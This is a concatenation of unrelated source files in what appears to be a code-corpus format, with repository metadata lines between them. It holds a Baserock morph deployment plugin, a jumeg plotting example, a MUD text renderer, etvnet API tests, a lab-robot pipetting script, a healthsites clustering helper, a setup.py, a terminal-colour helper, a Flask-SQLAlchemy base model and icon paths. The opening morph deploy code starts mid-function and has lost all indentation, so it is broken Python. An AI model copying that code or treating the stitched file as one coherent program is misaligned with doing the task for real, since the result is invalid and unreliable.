self, env_vars, all_deployments, all_subsystems):
for var in env_vars:
for subsystem in all_subsystems:
if subsystem == var:
raise cliapp.AppException(
'Cannot directly deploy subsystems. Create a top '
'level deployment for the subsystem %s instead.' %
subsystem)
if (not any(deployment in var
for deployment in all_deployments)
and not subsystem in var):
raise cliapp.AppException(
'Variable referenced a non-existent deployment '
'name: %s' % var)
def deploy_cluster(self, build_command, cluster_morphology, root_repo_dir,
repo, commit, env_vars, deployments):
# Create a tempdir for this deployment to work in
deploy_tempdir = tempfile.mkdtemp(
dir=os.path.join(self.app.settings['tempdir'], 'deployments'))
try:
for system in cluster_morphology['systems']:
self.deploy_system(build_command, deploy_tempdir,
root_repo_dir, repo, commit, system,
env_vars, deployments,
parent_location='')
finally:
shutil.rmtree(deploy_tempdir)
def deploy_system(self, build_command, deploy_tempdir,
root_repo_dir, build_repo, ref, system, env_vars,
deployment_filter, parent_location):
sys_ids = set(system['deploy'].iterkeys())
if deployment_filter and not \
any(sys_id in deployment_filter for sys_id in sys_ids):
return
old_status_prefix = self.app.status_prefix
system_status_prefix = '%s[%s]' % (old_status_prefix, system['morph'])
self.app.status_prefix = system_status_prefix
try:
# Find the artifact to build
morph = morphlib.util.sanitise_morphology_path(system['morph'])
srcpool = build_command.create_source_pool(build_repo, ref, morph)
artifact = build_command.resolve_artifacts(srcpool)
deploy_defaults = system.get('deploy-defaults', {})
for system_id, deploy_params in system['deploy'].iteritems():
if not system_id in deployment_filter and deployment_filter:
continue
deployment_status_prefix = '%s[%s]' % (
system_status_prefix, system_id)
self.app.status_prefix = deployment_status_prefix
try:
user_env = morphlib.util.parse_environment_pairs(
os.environ,
[pair[len(system_id)+1:]
for pair in env_vars
if pair.startswith(system_id)])
final_env = dict(deploy_defaults.items() +
deploy_params.items() +
user_env.items())
is_upgrade = ('yes' if self.app.settings['upgrade']
else 'no')
final_env['UPGRADE'] = is_upgrade
deployment_type = final_env.pop('type', None)
if not deployment_type:
raise morphlib.Error('"type" is undefined '
'for system "%s"' % system_id)
location = final_env.pop('location', None)
if not location:
raise morphlib.Error('"location" is undefined '
'for system "%s"' % system_id)
morphlib.util.sanitize_environment(final_env)
self.check_deploy(root_repo_dir, ref, deployment_type,
location, final_env)
system_tree = self.setup_deploy(build_command,
deploy_tempdir,
root_repo_dir,
ref, artifact,
deployment_type,
location, final_env)
for subsystem in system.get('subsystems', []):
self.deploy_system(build_command, deploy_tempdir,
root_repo_dir, build_repo,
ref, subsystem, env_vars, [],
parent_location=system_tree)
if parent_location:
deploy_location = os.path.join(parent_location,
location.lstrip('/'))
else:
deploy_location = location
self.run_deploy_commands(deploy_tempdir, final_env,
artifact, root_repo_dir,
ref, deployment_type,
system_tree, deploy_location)
finally:
self.app.status_prefix = system_status_prefix
finally:
self.app.status_prefix = old_status_prefix
def upgrade(self, args):
'''Upgrade an existing set of instances using built images.
See `morph help deploy` for documentation.
'''
if not args:
raise cliapp.AppException(
'Too few arguments to upgrade command (see `morph help '
'deploy`)')
if self.app.settings['upgrade']:
raise cliapp.AppException(
'Running `morph upgrade --upgrade` does not make sense.')
self.app.settings['upgrade'] = True
self.deploy(args)
def check_deploy(self, root_repo_dir, ref, deployment_type, location, env):
# Run optional write check extension. These are separate from the write
# extension because it may be several minutes before the write
# extension itself has the chance to raise an error.
try:
self._run_extension(
root_repo_dir, deployment_type, '.check',
[location], env)
except morphlib.extensions.ExtensionNotFoundError:
pass
def setup_deploy(self, build_command, deploy_tempdir, root_repo_dir, ref,
artifact, deployment_type, location, env):
# deployment_type, location and env are only used for saving metadata
# Create a tempdir to extract the rootfs in
system_tree = tempfile.mkdtemp(dir=deploy_tempdir)
try:
# Unpack the artifact (tarball) to a temporary directory.
self.app.status(msg='Unpacking system for configuration')
if build_command.lac.has(artifact):
f = build_command.lac.get(artifact)
elif build_command.rac.has(artifact):
build_command.cache_artifacts_locally([artifact])
f = build_command.lac.get(artifact)
else:
raise cliapp.AppException('Deployment failed as system is'
' not yet built.\nPlease ensure'
' the system is built before'
' deployment.')
tf = tarfile.open(fileobj=f)
tf.extractall(path=system_tree)
self.app.status(
msg='System unpacked at %(system_tree)s',
system_tree=system_tree)
self.app.status(
msg='Writing deployment metadata file')
metadata = self.create_metadata(
artifact, root_repo_dir, deployment_type, location, env)
metadata_path = os.path.join(
system_tree, 'baserock', 'deployment.meta')
with morphlib.savefile.SaveFile(metadata_path, 'w') as f:
json.dump(metadata, f, indent=4,
sort_keys=True, encoding='unicode-escape')
return system_tree
except Exception:
shutil.rmtree(system_tree)
raise
def run_deploy_commands(self, deploy_tempdir, env, artifact, root_repo_dir,
ref, deployment_type, system_tree, location):
# Extensions get a private tempdir so we can more easily clean
# up any files an extension left behind
deploy_private_tempdir = tempfile.mkdtemp(dir=deploy_tempdir)
env['TMPDIR'] = deploy_private_tempdir
try:
# Run configuration extensions.
self.app.status(msg='Configure system')
names = artifact.source.morphology['configuration-extensions']
for name in names:
self._run_extension(
root_repo_dir,
name,
'.configure',
[system_tree],
env)
# Run write extension.
self.app.status(msg='Writing to device')
self._run_extension(
root_repo_dir,
deployment_type,
'.write',
[system_tree, location],
env)
finally:
# Cleanup.
self.app.status(msg='Cleaning up')
shutil.rmtree(deploy_private_tempdir)
def _report_extension_stdout(self, line):
self.app.status(msg=line.replace('%s', '%%'))
def _report_extension_stderr(self, error_list):
def cb(line):
error_list.append(line)
sys.stderr.write('%s\n' % line)
return cb
def _report_extension_logger(self, name, kind):
return lambda line: logging.debug('%s%s: %s', name, kind, line)
def _run_extension(self, gd, name, kind, args, env):
'''Run an extension.
The ``kind`` should be either ``.configure`` or ``.write``,
depending on the kind of extension that is sought.
The extension is found either in the git repository of the
system morphology (repo, ref), or with the Morph code.
'''
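        # Illustrative call (extension name and arguments are examples only):
        #   self._run_extension(root_repo_dir, 'rawdisk', '.write',
        #                       [system_tree, location], env)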
error_list = []
with morphlib.extensions.get_extension_filename(name, kind) as fn:
ext = morphlib.extensions.ExtensionSubprocess(
report_stdout=self._report_extension_stdout,
report_stderr=self._report_extension_stderr(error_list),
report_logger=self._report_extension_logger(name, kind),
)
returncode = ext.run(fn, args, env=env, cwd=gd.dirname)
if returncode == 0:
logging.info('%s%s succeeded', name, kind)
else:
message = '%s%s failed with code %s: %s' % (
name, kind, returncode, '\n'.join(error_list))
raise cliapp.AppException(message)
def create_metadata(self, system_artifact, root_repo_dir, deployment_type,
location, env):
'''Deployment-specific metadata.
The `build` and `deploy` operations must be from the same ref, so full
info on the root repo that the system came from is in
/baserock/${system_artifact}.meta and is not duplicated here. We do
store a `git describe` of the definitions.git repo as a convenience for
post-upgrade hooks that we may need to implement at a future date:
the `git describe` output lists the last tag, which will hopefully help
us to identify which release of a system was deployed without having to
keep a list of SHA1s somewhere or query a Trove.
'''
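        # Illustrative shape of the returned metadata (values are invented):
        #   {
        #     "system-artifact-name": "...",
        #     "configuration": {...},          # env with passwords stripped
        #     "deployment-type": "rawdisk",
        #     "location": "/src/tmp/dev.img",
        #     "definitions-version": {"describe": "<git describe output>"},
        #     "morph-version": {"ref": ..., "tree": ..., "commit": ..., "version": ...}
        #   }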
def remove_passwords(env):
is_password = morphlib.util.env_variable_is_password
return { k:v for k, v in env.iteritems() if not is_password(k) }
meta = {
'system-artifact-name': system_artifact.name,
'configuration': remove_passwords(env),
'deployment-type': deployment_type,
'location': location,
'definitions-version': {
'describe': root_repo_dir.describe(),
},
'morph-version': {
'ref': morphlib.gitversion.ref,
'tree': morphlib.gitversion.tree,
'commit': morphlib.gitversion.commit,
'version': morphlib.gitversion.version,
},
}
return meta
| gpl-2.0 | -7,916,551,351,011,835,000 | 42.882698 | 79 | 0.57351 | false |
pravsripad/jumeg | examples/connectivity/plot_grouped_connectivity_circle.py | 2 | 1374 | #!/usr/bin/env python
'''
Example showing how to read grouped aparc labels from yaml file and plot
grouped connectivity circle with these labels.
Author: Praveen Sripad <[email protected]>
'''
import numpy as np
from jumeg import get_jumeg_path
from jumeg.connectivity import plot_grouped_connectivity_circle
import yaml
labels_fname = get_jumeg_path() + '/data/desikan_label_names.yaml'
yaml_fname = get_jumeg_path() + '/data/desikan_aparc_cortex_based_grouping.yaml'
replacer_dict_fname = get_jumeg_path() + '/data/replacer_dictionaries.yaml'
with open(labels_fname, 'r') as f:
label_names = yaml.safe_load(f)['label_names']
with open(replacer_dict_fname, 'r') as f:
replacer_dict = yaml.safe_load(f)['replacer_dict_aparc']
# make a random matrix with 68 nodes
# use simple seed for reproducibility
np.random.seed(42)
con = np.random.random((68, 68))
con[con < 0.5] = 0.
indices = (np.array((1, 2, 3)), np.array((5, 6, 7)))
plot_grouped_connectivity_circle(yaml_fname, con, label_names,
labels_mode='replace',
replacer_dict=replacer_dict,
out_fname='example_grouped_con_circle.png',
colorbar_pos=(0.1, 0.1),
n_lines=10, colorbar=True,
colormap='viridis')
| bsd-3-clause | -3,088,841,760,635,333,600 | 35.157895 | 80 | 0.624454 | false |
buckets1337/UOMUMM | src/Renderer.py | 1 | 5959 | # Renderer.py
# Various ways to format text output to players
class Renderer():
'''
A renderer component just contains methods for formatting text output in various ways
'''
def __init__(self, server):
self.owner = server
def formatMessage(self, message, width):
'''
splits a <message> string into lines that are <width> characters long without breaking words
apart across lines. Broken apart single lines are slightly indented on every line other than
the first in the final formatted message.
Returns the formatted message string.
'''
count = 0
formatted = ''
if message == None:
message = 'None'
for character in range(0,len(message)):
char = message[character]
if char != '\n':
if count < width:
formatted += char
count += 1
#print formatted
else:
if message[character] == ' ':
formatted += "\n" + char
count = 2
#print 'da TRUTH'
else:
collecting = True
coll = ''
i = 1
while collecting:
if message[character-i] != '\n':
coll += message[character-i]
i += 1
else:
collecting = False
if ' ' not in coll.strip():
#print 'TRUE'
formatted += "\n " + char
count = 2
else:
#print 'checking...'
checking = True
i = 1
while checking:
msg = message.strip()
chk = msg[character-i]
#print chk
if chk == ' ':
#print formatted
formatted = formatted[:-i] + "\n" + formatted[-i:] + char
#print formatted
count = i + 1
checking = False
else:
i += 1
else:
formatted += char
count = 0
return formatted
def messageBox(self, client, title, message):
'''
displays a simple <message> in a box for <client>.
The box resizes to fit the message and title.
Has a <title> at the top of the box along the border.
'''
message = self.formatMessage(message, 76)
#print message
if message.endswith("\n"):
message = message[:-1]
msgLines = message.split('\n')
#print msgLines
finalMsg = ''
longest = 0
for line in msgLines:
if len(line) > longest:
longest = len(line)
for line in msgLines:
if longest > len(str(title)):
if longest > len(line):
mod = longest - len(line)
line = line + ((mod) * " ")
# else:
# line = line + ((len(str(title)) - 4) * " ")
else:
mod = (len(str(title)) + 2) - len(line)
line = line + (mod * " ")
line = " | " + line + " |\n"
finalMsg += line
#print int((0.5)*float(longest))
if longest >= len(str(title)):
titleLine = "\n " + (int((0.5)*float(longest - len(str(title)))+1)* "_") + "^!"+str(title)+"^~" + (int((0.5)*float(longest - len(str(title)))+1)* "_") + "\n"
titleLineLen = len(titleLine) - 6
if titleLineLen > (longest + 2):
#print len(titleLine)
#print longest + 2
diff = titleLineLen - (longest + 2) - 1
if not diff <= 0:
titleLine = titleLine[:-diff] + "\n"
if diff == 0:
titleLine = titleLine[:-1] + "_\n"
elif (longest + 2) >= titleLineLen:
diff = (longest + 2) - titleLineLen
if titleLine.endswith("\n"):
titleLine = titleLine[:-1]
titleLine += (diff * "_") + "\n"
client.send_cc(titleLine)
client.send_cc(" |" + ((longest + 2)*" ") + "|\n")
client.send_cc(finalMsg)
client.send_cc(" |" + ((longest + 2)*"_") + "|\n\n")
else:
client.send_cc("\n __^!" + str(title) + "^~__\n")
client.send_cc(" |" + ((4 + len(str(title))) * " ") + "|\n")
client.send_cc(finalMsg)
client.send_cc(" |" + ((4 + len(str(title))) * "_") + "|\n\n")
def roomDisplay(self, client, room):
'''
renders the typical display for a room to client
'''
namePad = 80 - len(room.name) - 2
client.send_cc("\n")
message = "+" + ("-" * (int(0.5 *namePad)-1)) + "^! " + str(room.name) + " ^~" + ("-" * (int(0.5* namePad)-1)) + "+" + "\n"
if len(message) < 81:
message = "+" + ("-" * (int(0.5 *namePad)-1)) + "^! " + str(room.name) + " ^~" + ("-" * (int(0.5* namePad)-1)) + "-+" + "\n"
client.send_cc(message)
# client.send_cc("|" + (" " * 78) + "|" + "\n")
descrip = self.formatMessage(room.description, 76)
desc = descrip.split("\\n")
#print desc
for line in desc:
linePad = 80 - len(line) - 2
if len(line) > 0:
message = "|" +(" " * (int(0.5 *linePad))) + line +(" " * (int(0.5 *linePad))) + "|" + "\n"
if len(message) < 81:
message = ("|" +(" " * (int(0.5 *linePad))) + line +(" " * (int(0.5 *linePad))) + " |" + "\n")
client.send_cc(message)
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("+" + ("-" * 78) + "+" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
#print "players: " + str(room.players)
for player in room.players:
if player.connection != client:
playerPad = int(80 - len(player.name) - 3)
client.send_cc("| " + "^C" + str(player.name) + "^~" + (" " * playerPad) + "|" + "\n")
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
exitList = []
if room.orderedExits == []:
#print 'test'
#print room.exits
for exit in room.exits:
#print room.exits[exit]
exitList.append(str(room.exits[exit]))
room.orderedExits = exitList
else:
for rm in room.orderedExits:
exitList.append(str(rm[1]))
#print exitList
if exitList != []:
lenExit = len(exitList[0])
else:
lenExit = 0
firstPad = int(80 - lenExit - 12)
if exitList != []:
msg = "| " + "^!exits:^~ 1." + exitList[0] + (" " * firstPad) + "|" + "\n"
client.send_cc(msg)
i = 2
for exit in exitList[1:]:
pad = int(80 - len(exitList[i-1]) - 12)
client.send_cc("| " + str(i) + "." + exitList[i-1] + (" " * pad) + "|" + "\n")
i += 1
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("+" + ("-" * 78) + "+" + "\n") | apache-2.0 | -8,190,471,305,137,985,000 | 28.8 | 161 | 0.52492 | false |
shvets/etvnet-plex-plugin | test/archive_service_test.py | 1 | 7248 | import test_helper
import unittest
import json
from etvnet_service import EtvnetService
from config import Config
class EtvnetServiceTest(unittest.TestCase):
def setUp(self):
config = Config("../etvnet.config")
self.service = EtvnetService(config)
def test_channels(self):
result = self.service.get_channels()
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
for value in result['data']:
print(value['name'])
def test_archive(self):
result = self.service.get_archive(channel=3)
# print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']['media']), 0)
print(json.dumps(result['data']['media'], indent=4))
def test_genres(self):
result = self.service.get_genres()
# print(json.dumps(result, indent=4))
for item in result['data']:
print(item['id'])
print(item['name'])
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_blockbusters(self):
result = self.service.get_blockbusters()
#print(json.dumps(result, indent=4))
for item in result['data']['media']:
print(item['type'])
print(item['id'])
print(item['name'])
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']['media']), 0)
# def test_serials(self):
# result = self.service.get_serials()
#
# #print(json.dumps(result, indent=4))
#
# for item in result['data']['media']:
# print(item['type'])
# print(item['id'])
# print(item['name'])
#
# self.assertEqual(result['status_code'], 200)
# self.assertNotEqual(len(result['data']['media']), 0)
# def test_movies(self):
# result = self.service.get_movies()
#
# #print(json.dumps(result, indent=4))
#
# for item in result['data']['media']:
# print(item['type'])
# print(item['id'])
# print(item['name'])
#
# self.assertEqual(result['status_code'], 200)
# self.assertNotEqual(len(result['data']['media']), 0)
def test_search(self):
query= "news"
result = self.service.search(query=query)
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_pagination(self):
query= "news"
result = self.service.search(query=query, page=1, per_page=20)
#print(json.dumps(result, indent=4))
pagination = result['data']['pagination']
self.assertEqual(pagination['has_next'], True)
self.assertEqual(pagination['has_previous'], False)
self.assertEqual(pagination['page'], 1)
result = self.service.search(query=query, page=2)
#print(json.dumps(result, indent=4))
pagination = result['data']['pagination']
self.assertEqual(pagination['has_next'], True)
self.assertEqual(pagination['has_previous'], True)
self.assertEqual(pagination['page'], 2)
def test_new_arrivals(self):
result = self.service.get_new_arrivals()
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_get_url(self):
id = '946671' # 329678
bitrate = '1200'
format = 'mp4'
url_data = self.service.get_url(id, bitrate=bitrate, format=format, protocol='hls')
print('Media Url: ' + url_data['url'])
def test_media_object(self):
result = self.service.get_archive(channel=3)
#print(json.dumps(result, indent=4))
media_object = None
for item in result['data']['media']:
type = item['type']
if type == 'MediaObject':
media_object = item
break
print(json.dumps(media_object, indent=4))
bitrates = self.service.bitrates(media_object['files'])
if 'mp4' in bitrates.keys():
format = 'mp4'
else:
format = 'wmv'
bitrate = bitrates[format][0]
url_data = self.service.get_url(media_object['id'], bitrate=bitrate, format=format, other_server=True)
self.print_url_data(url_data, bitrates)
def test_container(self):
result = self.service.get_archive(channel=3)
#print(json.dumps(result, indent=4))
container = None
for item in result['data']['media']:
type = item['type']
if type == 'Container':
container = item
break
#print(json.dumps(container, indent=4))
children = self.service.get_children(container['id'])
#print(json.dumps(children, indent=4))
first_media_object = None
for child in children['data']['children']:
if child['type'] == 'MediaObject':
first_media_object = child
print(json.dumps(first_media_object, indent=4))
bitrates = self.service.bitrates(first_media_object['files'])
bitrate = bitrates['mp4'][2]
url_data = self.service.get_url(first_media_object['id'], bitrate=bitrate, format='mp4')
self.print_url_data(url_data, bitrates)
def print_url_data(self, url_data, bitrates):
print("Available bitrates:")
if 'wmv' in bitrates.keys():
print("wmv: (" + " ".join(str(x) for x in bitrates['wmv']) + ")")
if 'mp4' in bitrates.keys():
print("mp4: (" + " ".join(str(x) for x in bitrates['mp4']) + ")")
print('Format: ' + url_data['format'])
print('Bitrate: ' + str(url_data['bitrate']))
print('Protocol: ' + str(url_data['protocol']))
print('Media Url: ' + url_data['url'])
def test_get_bookmarks(self):
result = self.service.get_bookmarks()
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_get_folders(self):
result = self.service.get_folders()
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_get_bookmark(self):
bookmarks = self.service.get_bookmarks()
bookmark = bookmarks['data']['bookmarks'][0]
result = self.service.get_bookmark(id=bookmark['id'])
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_get_topics(self):
for topic in EtvnetService.TOPICS:
result = self.service.get_topic_items(topic)
#print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
if __name__ == '__main__':
unittest.main() | mit | -6,844,560,154,461,055,000 | 27.652174 | 110 | 0.577401 | false |
tdlong/YeastRobot | UserPrograms/ASE/Rearray_day3_pilot_1.py | 1 | 1439 | import sys
# where RobotControl.py, etc lives
sys.path.append('/home/pi/Desktop/ADL/YeastRobot/PythonLibrary')
from RobotControl import *
#################################
### Define Deck Layout
#################################
deck="""\
DW96W SW96P SW96P SW96P SW96P SW96P SW96P BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
"""
# 2 3 4 5 6
# note the 1st user defined column is "2" not zero or one, since tips are at 0 & 1
##################################
myvol = 140
# 1 = UL of BoxA, 2 = UR of BoxA, 3 = LL of BoxA, etc.
OffsetDict={0: 'UL', 1: 'UR', 2: 'LL', 3: 'LR'}
# read in deck, etc
DefineDeck(deck)
printDeck()
InitializeRobot()
CurrentTipPosition = 1
for offset in [0,1,2,3]:
CurrentTipPosition = retrieveTips(CurrentTipPosition)
extraSeatTips()
# initial mix
position(0,2, position = OffsetDict[offset])
mix(300,98,100,5)
# From DW96W to SW96P with 140ul of glycerol
# 6 replicate glycerol stocks
for i in [3,4,5,6,7,8]:
position(0,2, position = OffsetDict[offset])
aspirate(myvol,depth=99,speed=50, mix=3)
position(0,i, position = OffsetDict[offset])
moveDispense(myvol, startdepth = 95, enddepth=60, speed = 50)
disposeTips()
position(0,0)
ShutDownRobot()
quit()
| gpl-3.0 | -2,579,611,862,031,048,700 | 27.215686 | 84 | 0.603892 | false |
cchristelis/watchkeeper | django_project/healthsites/utils.py | 1 | 1525 | __author__ = 'Irwan Fathurrahman <[email protected]>'
__date__ = '25/04/16'
__license__ = "GPL"
__copyright__ = 'kartoza.com'
import os
import json
from django.conf import settings
from django.core.serializers.json import DjangoJSONEncoder
from healthsites.map_clustering import cluster, parse_bbox
from healthsites.models.healthsite import Healthsite
def healthsites_clustering(bbox, zoom, iconsize):
# parse request params
if zoom <= settings.CLUSTER_CACHE_MAX_ZOOM:
# if geoname and tag are not set we can return the cached layer
        # try to read healthsites from disk
filename = os.path.join(
settings.CLUSTER_CACHE_DIR,
'{}_{}_{}_healthsites.json'.format(zoom, *iconsize)
)
try:
cached_locs = open(filename, 'rb')
cached_data = cached_locs.read()
return cached_data
        except IOError:
            localities = Healthsite.objects.all()
            object_list = cluster(localities, zoom, *iconsize)
            # serialize first (json.dump returns None and would make this
            # function return None), then create the missing cache
            json_dump = json.dumps(object_list, cls=DjangoJSONEncoder)
            with open(filename, 'wb') as cache_file:
                cache_file.write(json_dump)
            return json_dump
else:
# make polygon
bbox_poly = parse_bbox(bbox)
# cluster healthsites for a view
healthsites = Healthsite.objects.filter(point_geometry__contained=bbox_poly)
object_list = cluster(healthsites, zoom, *iconsize)
return json.dumps(object_list, cls=DjangoJSONEncoder)
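# Hypothetical view-level helper (not part of the original module; the name and
# query parameters are illustrative) showing how the function above could be
# exposed over HTTP:
def healthsites_clustering_view(request):
    from django.http import HttpResponse
    bbox = request.GET.get('bbox', '')              # "minx,miny,maxx,maxy"
    zoom = int(request.GET.get('zoom', 3))
    icon_size = [48, 46]
    payload = healthsites_clustering(bbox, zoom, icon_size)
    return HttpResponse(payload, content_type='application/json')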
| bsd-2-clause | -7,391,638,456,330,655,000 | 34.465116 | 84 | 0.64 | false |
kmerenkov/clitter | setup.py | 1 | 1981 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2008, Konstantin Merenkov <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Konstantin Merenkov <[email protected]> ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Konstantin Merenkov <[email protected]> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from distutils.core import setup
setup(name='clitter',
version='0.1',
description='Command line twitter client',
author='Konstantin Merenkov',
author_email='[email protected]',
url='http://github.com/kmerenkov/clitter/',
packages=['clitter/twitter', 'clitter'],
scripts=['bin/clitter'])
| bsd-3-clause | 7,848,016,887,700,294,000 | 52.540541 | 91 | 0.745583 | false |
Debian/dak | daklib/termcolor.py | 1 | 1725 | # vim:set et sw=4:
"""
TermColor utils for dak
@contact: Debian FTP Master <[email protected]>
@copyright: 2019 Mo Zhou <[email protected]>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
###############################################################################
__all__ = []
###############################################################################
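# The colour names below map, in order, onto ANSI SGR foreground codes 31-37
# (red=31 ... white=37), which is what _COLOR_CODES_ computes.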
_COLORS_ = ('red', 'green', 'yellow', 'blue', 'violet', 'cyan', 'white')
_COLOR_CODES_ = {k: 31 + _COLORS_.index(k) for k in _COLORS_}
def colorize(s, fg, bg=None, bold=False, ul=False):
'''
    s: str -- string to be colorized
    fg: str -- foreground color; must be one of _COLORS_
    bg: str -- background color (not implemented yet)
    bold: bool -- bold font? (not implemented yet)
    ul: bool -- underline? (not implemented yet)
'''
if fg not in _COLORS_:
raise ValueError("Unsupported foreground Color!")
if (bg is not None) or any((bold, ul)):
raise NotImplementedError
return "\x1b[{}m{}\x1b[0;m".format(_COLOR_CODES_[fg], s)
| gpl-2.0 | -1,461,835,152,391,277,600 | 36.5 | 79 | 0.624928 | false |
alissonpintor/stoky | app/basemodel.py | 1 | 1966 | from flask_sqlalchemy import Model
from sqlalchemy import exc as core_exc
from sqlalchemy.orm import exc
class Result(object):
"""
    Class that receives the result of an operation (status and message)
"""
def __init__(self, status, message):
self.status = status
self.message = message
class BaseModel(Model):
"""
    Base Model class that contains common methods
    such as delete, search by id, and update
"""
def update(self):
from app import db
try:
db.session.add(self)
db.session.commit()
return Result(status=True, message='Registro realizado com sucesso')
except Exception as e:
return Result(status=False, message=str(e))
def delete(self):
from app import db
try:
db.session.delete(self)
db.session.commit()
return Result(status=True, message='Registro excluído com sucesso')
except core_exc.IntegrityError:
return Result(status=False, message='Não foi possível excluir. Erro de Integridade')
except Exception as e:
return Result(status=False, message=str(e))
@classmethod
def by_id(cls, id):
from app import db
primary_key = db.inspect(cls).primary_key[0]
data = db.session.query(
cls
).filter(
primary_key==id
).first()
return data
@classmethod
def by(cls, **kwargs):
from app import db
data = db.session.query(cls)
for k, v in kwargs.items():
if k.upper() in cls.__table__.columns.keys():
column = cls.__table__.columns[k.upper()]
data = data.filter(column==v)
data = data.first()
return data
@classmethod
def all(cls):
from app import db
data = cls.query.all()
return data | gpl-3.0 | -4,292,930,550,900,183,600 | 24.842105 | 96 | 0.545593 | false |
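# Hypothetical usage sketch (model and column names are illustrative only);
# a concrete model would use BaseModel as the declarative base, e.g.:
#
#   db = SQLAlchemy(app, model_class=BaseModel)
#
#   class Product(db.Model):
#       __tablename__ = 'PRODUCT'
#       ID_PRODUCT = db.Column(db.Integer, primary_key=True)
#       NAME = db.Column(db.String(60))
#
#   product = Product.by_id(1)           # lookup by primary key
#   result = product.update()            # returns Result(status, message)
#   same = Product.by(name='Widget')     # kwargs matched to upper-case columns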
brigittebigi/proceed | proceed/src/wxgui/sp_icons.py | 1 | 2562 | import os.path
from sp_glob import ICONS_PATH
# Frames
APP_ICON = os.path.join(ICONS_PATH, "app.ico")
APP_CHECK_ICON = os.path.join(ICONS_PATH, "appcheck.ico")
APP_EXPORT_PDF_ICON = os.path.join(ICONS_PATH, "appexport-pdf.ico")
# For the toolbar of the main frame
EXIT_ICON = os.path.join(ICONS_PATH, "exit.png")
OPEN_ICON = os.path.join(ICONS_PATH, "open.png")
SAVE_ICON = os.path.join(ICONS_PATH, "save.png")
CHECK_ICON = os.path.join(ICONS_PATH, "check.png")
EXPORT_ICON = os.path.join(ICONS_PATH, "export.png")
ADD_ICON = os.path.join(ICONS_PATH, "add.png")
EDIT_ICON = os.path.join(ICONS_PATH, "edit.png")
DELETE_ICON = os.path.join(ICONS_PATH, "delete.png")
ABOUT_ICON = os.path.join(ICONS_PATH, "about.png")
FEEDBACK_ICON = os.path.join(ICONS_PATH, "feedback.png")
CANCEL_ICON = os.path.join(ICONS_PATH, "cancel.png")
APPLY_ICON = os.path.join(ICONS_PATH, "apply.png")
HELP_ICON = os.path.join(ICONS_PATH, "help.png" )
FORWARD_ICON = os.path.join(ICONS_PATH, "forward.png" )
BACKWARD_ICON = os.path.join(ICONS_PATH, "backward.png" )
NEXT_ICON = os.path.join(ICONS_PATH, "next.png")
PREVIOUS_ICON = os.path.join(ICONS_PATH, "previous.png")
HOME_ICON = os.path.join(ICONS_PATH, "home.png" )
LOGOUT_ICON = os.path.join(ICONS_PATH, "logout.png" )
SETTINGS_ICON = os.path.join(ICONS_PATH, "settings.png" )
# For the other frames
AUTHOR_ICON = os.path.join(ICONS_PATH, "author.png")
DOCUMENT_ICON = os.path.join(ICONS_PATH, "document.png")
SESSION_ICON = os.path.join(ICONS_PATH, "session.png")
CONFERENCE_ICON = os.path.join(ICONS_PATH, "conference.png")
IMPORT_EXPORT_ICON = os.path.join(ICONS_PATH, "import-export.png")
GRID_ICON = os.path.join(ICONS_PATH, "grid.png")
TEX_ICON = os.path.join(ICONS_PATH, "tex.png")
